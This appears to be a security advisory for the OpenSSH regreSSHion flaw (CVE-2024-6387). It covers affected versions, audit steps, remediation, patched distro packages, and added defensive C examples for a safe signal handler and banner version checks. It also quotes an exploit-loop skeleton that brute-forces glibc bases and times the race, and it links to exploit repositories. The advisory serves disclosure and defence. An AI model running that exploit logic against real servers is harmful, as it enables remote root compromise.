- Assigner: redhat
- Published: 2024-07-01T12:37:25.431Z
- Updated: 2024-07-01T12:37:25.431Z
- Score: 8.1 (HIGH) [cvssV3_1]
Summary:
A signal handler race condition has been discovered in OpenSSH's server (sshd).
This issue can occur when a client fails to authenticate to the SSH server within the configured LoginGraceTime (default 120 seconds; 600 seconds in older OpenSSH versions). When the LoginGraceTime expires, sshd's SIGALRM handler is invoked asynchronously, and the problem arises from calling functions that are not async-signal-safe within that SIGALRM handler.
To exploit this vulnerability, an attacker must leverage the signal handler race condition, which requires a timing attack and memory manipulation. An attacker can use this to execute arbitrary code remotely with root privileges, posing a significant security threat to the system.
Below is an example taken from this GitHub repo; it outlines the steps an attacker might take to exploit this vulnerability:
```c
int perform_exploit(const char *ip, int port) {
    int success = 0;
    double parsing_time = 0;
    double timing_adjustment = 0;
    for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++) {
        uint64_t glibc_base = GLIBC_BASES[base_idx];
        printf("Attempting exploitation with glibc base: 0x%lx\n", glibc_base);
        for (int attempt = 0; attempt < 10000 && !success; attempt++) {
            if (attempt % 1000 == 0) {
                printf("Attempt %d of 10000\n", attempt);
            }
            int sock = setup_connection(ip, port);
            if (sock < 0) {
                fprintf(stderr, "Failed to establish connection, attempt %d\n", attempt);
                continue;
            }
            if (perform_ssh_handshake(sock) < 0) {
                fprintf(stderr, "SSH handshake failed, attempt %d\n", attempt);
                close(sock);
                continue;
            }
            prepare_heap(sock);
            time_final_packet(sock, &parsing_time);
            // Implement feedback-based timing strategy
            parsing_time += timing_adjustment;
            if (attempt_race_condition(sock, parsing_time, glibc_base)) {
                printf("Possible exploitation success on attempt %d with glibc base 0x%lx!\n", attempt, glibc_base);
                success = 1;
                // In a real exploit, we would now attempt to interact with the shell
            } else {
                // Adjust timing based on feedback
                timing_adjustment += 0.00001; // Small incremental adjustment
            }
            close(sock);
            usleep(100000); // 100ms delay between attempts
        }
    }
    return success;
}
```
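The Summary describes the root cause as a SIGALRM handler that calls functions which are not async-signal-safe. The following is an added example, not OpenSSH's code and not taken from the repository above, that puts that anti-pattern beside the safe form: a handler that only stores into a `volatile sig_atomic_t` and leaves logging and cleanup to the ordinary control flow. All function names (`unsafe_grace_alarm_handler`, `run_login_grace`, and so on) are hypothetical; the unsafe handler is defined for contrast only and is never installed.

```c
/* Added example, not OpenSSH code: contrasts a SIGALRM handler that calls
 * async-signal-unsafe functions with one that only records the event.
 * All function names are hypothetical. */
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Anti-pattern (defined for contrast, never installed here): the handler
 * logs through stdio and touches the heap. If SIGALRM lands while the
 * interrupted code holds the malloc or stdio locks, these calls re-enter
 * non-reentrant state. This is the class of defect the Summary describes. */
void unsafe_grace_alarm_handler(int sig)
{
    (void)sig;
    char *msg = malloc(64);                       /* not async-signal-safe */
    if (msg != NULL) {
        snprintf(msg, 64, "Timeout before authentication");
        fprintf(stderr, "%s\n", msg);             /* not async-signal-safe */
        free(msg);                                /* not async-signal-safe */
    }
    exit(1);                                      /* runs atexit() handlers */
}

/* Safe pattern: the handler stores into a volatile sig_atomic_t and returns.
 * Everything else happens in the main flow once it observes the flag.
 * (Calling _exit() directly from the handler is the other safe choice.) */
static volatile sig_atomic_t grace_expired = 0;

static void safe_grace_alarm_handler(int sig)
{
    (void)sig;
    grace_expired = 1;     /* the only side effect */
}

/* Install the safe handler for SIGALRM; returns 0 on success. */
int install_grace_handler(void)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = safe_grace_alarm_handler;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = 0;       /* no SA_RESTART: blocking I/O returns EINTR so the loop sees the flag */
    return sigaction(SIGALRM, &sa, NULL);
}

/* Minimal stand-in for the pre-authentication wait. With deliver_now set the
 * alarm is raised synchronously (useful for a test); otherwise a timer of
 * grace_secs is armed. Returns 1 once the grace period has expired, or -1 if
 * the handler could not be installed. */
int run_login_grace(unsigned grace_secs, int deliver_now)
{
    grace_expired = 0;
    if (install_grace_handler() != 0)
        return -1;
    if (deliver_now)
        raise(SIGALRM);
    else
        alarm(grace_secs);
    while (!grace_expired)
        pause();           /* returns after the handler has run */
    alarm(0);
    /* Logging and cleanup happen here, in ordinary context, not in the handler. */
    fprintf(stderr, "Timeout before authentication after %u s\n", grace_secs);
    return 1;
}

/* Expose the flag so callers (and tests) can confirm the handler ran. */
int grace_flag(void)
{
    return grace_expired;
}

int main(void)
{
    /* Stand-alone: arm a 2 second grace timer and wait for it to expire. */
    return run_login_grace(2, 0) == 1 ? 0 : 1;
}
```

The point of the contrast is that the set of things a handler may safely do is tiny (store to a `sig_atomic_t`, call `_exit()` and the other functions POSIX lists as async-signal-safe); anything involving `malloc`, `free`, stdio or `exit()` belongs in the main flow after the flag is observed.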
Affected:
- OpenSSH versions earlier than 4.4p1 (unless patched for CVE-2006-5051 and CVE-2008-4109)
- OpenSSH versions 8.5p1 through 9.7p1 (9.8 and 9.8p1 are not affected)
Audit:
- Verify that SSH is accessible from public networks.
- Verify that a vulnerable version of OpenSSH is in use.
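The second audit step needs the version reported by the server mapped onto the ranges listed under Affected. The following is an added example, not part of this advisory or of any of the tools listed below: it parses the `OpenSSH_X.YpZ` token out of an SSH banner or an `ssh -V` line and classifies it against the two affected ranges. The banner strings in `main` are constructed samples. Note the caveat the table further down implies: distributions backport the fix without changing the upstream version (Ubuntu 24.04's patched openssh-server is still 9.6p1), so `SSH_IN_AFFECTED_RANGE` means "confirm the installed package build against the vendor advisory", not "confirmed vulnerable".

```c
/* Added example, not part of the advisory: classify an OpenSSH version
 * string against the affected ranges for CVE-2024-6387. Function and enum
 * names are hypothetical. */
#include <stdio.h>
#include <string.h>

enum ssh_status {
    SSH_UNKNOWN = -1,          /* not an OpenSSH banner, or unparsable */
    SSH_NOT_AFFECTED = 0,      /* 4.4p1 .. 8.4p1, or 9.8 and later */
    SSH_IN_AFFECTED_RANGE = 1, /* 8.5p1 .. 9.7p1: check the distro package build */
    SSH_LEGACY_CHECK = 2       /* before 4.4p1: affected unless patched for CVE-2006-5051 */
};

typedef struct {
    unsigned major, minor, plevel;   /* plevel is the "pN" portable suffix, 0 if absent */
} ossh_ver;

/* Extract "OpenSSH_9.6p1" from a banner ("SSH-2.0-OpenSSH_9.6p1 Ubuntu-...")
 * or from `ssh -V` output ("OpenSSH_9.6p1 Ubuntu-..., OpenSSL ..."). Returns 0 on success. */
int parse_openssh_version(const char *s, ossh_ver *v)
{
    const char *p = strstr(s, "OpenSSH_");
    int consumed = 0;
    if (p == NULL)
        return -1;
    p += strlen("OpenSSH_");
    if (sscanf(p, "%u.%u%n", &v->major, &v->minor, &consumed) != 2)
        return -1;
    p += consumed;
    v->plevel = 0;
    if (*p == 'p' && sscanf(p + 1, "%u", &v->plevel) != 1)
        return -1;
    return 0;
}

/* Three-way comparison of a parsed version against (maj, min, pl). */
static int ver_cmp(ossh_ver a, unsigned maj, unsigned min, unsigned pl)
{
    if (a.major != maj) return a.major < maj ? -1 : 1;
    if (a.minor != min) return a.minor < min ? -1 : 1;
    if (a.plevel != pl) return a.plevel < pl ? -1 : 1;
    return 0;
}

/* Map a banner onto the Affected ranges from this advisory. */
enum ssh_status classify_banner(const char *banner)
{
    ossh_ver v;
    if (parse_openssh_version(banner, &v) != 0)
        return SSH_UNKNOWN;
    if (ver_cmp(v, 4, 4, 1) < 0)
        return SSH_LEGACY_CHECK;        /* earlier than 4.4p1 */
    if (ver_cmp(v, 8, 5, 1) < 0)
        return SSH_NOT_AFFECTED;        /* 4.4p1 .. 8.4p1 */
    if (ver_cmp(v, 9, 8, 0) < 0)
        return SSH_IN_AFFECTED_RANGE;   /* 8.5p1 .. 9.7p1 */
    return SSH_NOT_AFFECTED;            /* 9.8, 9.8p1 and later */
}

const char *ssh_status_name(enum ssh_status s)
{
    switch (s) {
    case SSH_NOT_AFFECTED:      return "not affected";
    case SSH_IN_AFFECTED_RANGE: return "in affected range (verify distro package build)";
    case SSH_LEGACY_CHECK:      return "pre-4.4p1 (check CVE-2006-5051 patch status)";
    default:                    return "unknown / not OpenSSH";
    }
}

int main(void)
{
    /* Constructed sample banners, not captured from any real host. */
    const char *samples[] = {
        "SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.3",
        "SSH-2.0-OpenSSH_8.7p1",
        "SSH-2.0-OpenSSH_9.8p1",
        "SSH-2.0-OpenSSH_4.3p2",
        "OpenSSH_9.7p1, OpenSSL 3.0.13 30 Jan 2024",
        "SSH-2.0-dropbear_2022.83",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-45s -> %s\n", samples[i], ssh_status_name(classify_banner(samples[i])));
    return 0;
}
```

For hosts that report `SSH_IN_AFFECTED_RANGE`, compare the installed package version (for example `dpkg -s openssh-server` or `rpm -q openssh-server`) against the Patched Version column in the table below rather than trusting the banner alone.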
Remediation:
- Apply the latest available update for the OpenSSH server (version 9.8p1), which fixes the vulnerability.
- Restrict SSH access using network-based controls such as firewalls and implement network segmentation to prevent lateral movement.
- If the OpenSSH server cannot be updated immediately, set the 'LoginGraceTime' to 0 in the sshd configuration file, but note that this can expose the server to denial-of-service attacks.
- For container-based applications, ensure that remote shell access services (e.g., sshd, rlogin, vnc) are not running, regardless of the vulnerability.
- OpenSSH 4.4p1 is typically found in Red Hat-based systems such as Red Hat 4 and 5. If you are using such systems, they should be replaced with a current OS.
Note:
- Below are commonly used Linux OS versions that are vulnerable to CVE-2024-6387 and their patch information.
- The CVE-2024-6387 vulnerability for RedHat Enterprise Linux 9 has been changed to CVE-2024-6409 (2024.07.08)
No. | Vulnerable OS | Patched Version | Security Advisory |
---|---|---|---|
1 | Ubuntu 24.04 | openssh-client 1:9.6p1-3ubuntu13.3, openssh-server 1:9.6p1-3ubuntu13.3 | https://ubuntu.com/security/notices/USN-6859-1 |
2 | Ubuntu 23.10 | openssh-client 1:9.3p1-1ubuntu3.6, openssh-server 1:9.3p1-1ubuntu3.6 | https://ubuntu.com/security/notices/USN-6859-1 |
3 | Ubuntu 22.04 | openssh-client 1:8.9p1-3ubuntu0.10, openssh-server 1:8.9p1-3ubuntu0.10 | https://ubuntu.com/security/notices/USN-6859-1 |
4 | Amazon Linux 2023 | openssh-client 8.7p1-8.amzn2023.0.11, openssh-server 8.7p1-8.amzn2023.0.11 | https://explore.alas.aws.amazon.com/CVE-2024-6387.html |
5 | Red Hat Enterprise Linux 9 | No patch released yet (2024.07.08) | CVE-2024-6387 changed to CVE-2024-6409 (Red Hat Enterprise Linux 9 only): https://access.redhat.com/security/cve/CVE-2024-6409 |
6 | Rocky Linux 9 | openssh-8.7p1-38.el9_4.security.0.5 | https://rockylinux.org/news/2024-07-01-openssh-sigalrm-regression |
Tools:
- https://github.com/xaitax/CVE-2024-6387_Check
- https://github.com/th3gokul/CVE-2024-6387
- https://github.com/no-one-sec/CVE-2024-6387
- https://github.com/xonoxitron/regreSSHion
- https://github.com/xristos8574/regreSSHion-nmap-scanner
- https://github.com/AiGptCode/ssh_exploiter_CVE-2024-6387
- https://github.com/n1cks0n/Test_CVE-2024-6387
- https://github.com/l0n3m4n/CVE-2024-6387
- ...
References:
- http://www.openwall.com/lists/oss-security/2024/07/01/12
- https://access.redhat.com/security/cve/CVE-2024-6387
- https://bugzilla.redhat.com/show_bug.cgi?id=2294604
- https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt
- https://github.com/zgzhang/cve-2024-6387-poc
- https://ubuntu.com/security/CVE-2024-6387
- https://ubuntu.com/security/notices/USN-6859-1
- https://www.suse.com/security/cve/CVE-2024-6387.html
- https://explore.alas.aws.amazon.com/CVE-2024-6387.html
- https://archlinux.org/news/the-sshd-service-needs-to-be-restarted-after-upgrading-to-openssh-98p1/
- https://www.openssh.com/txt/release-9.8
- https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-July/000158.html
- https://lists.mindrot.org/pipermail/openssh-unix-dev/2024-July/041431.html
- https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
- https://www.theregister.com/2024/07/01/regresshion_openssh/
- https://news.ycombinator.com/item?id=40843778
- https://security-tracker.debian.org/tracker/CVE-2024-6387
- oracle/oracle-linux#149
- rapier1/hpn-ssh#87
- https://stackdiary.com/openssh-race-condition-in-sshd-allows-remote-code-execution/
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0010
- http://www.openwall.com/lists/oss-security/2024/07/01/13
- https://security.netapp.com/advisory/ntap-20240701-0001/
- https://www.armosec.io/blog/cve-2024-6387-regresshion-rce-vulnerability-openssh/
- https://vulcan.io/blog/cve-2024-6387-how-to-fix-regresshion-vulnerability/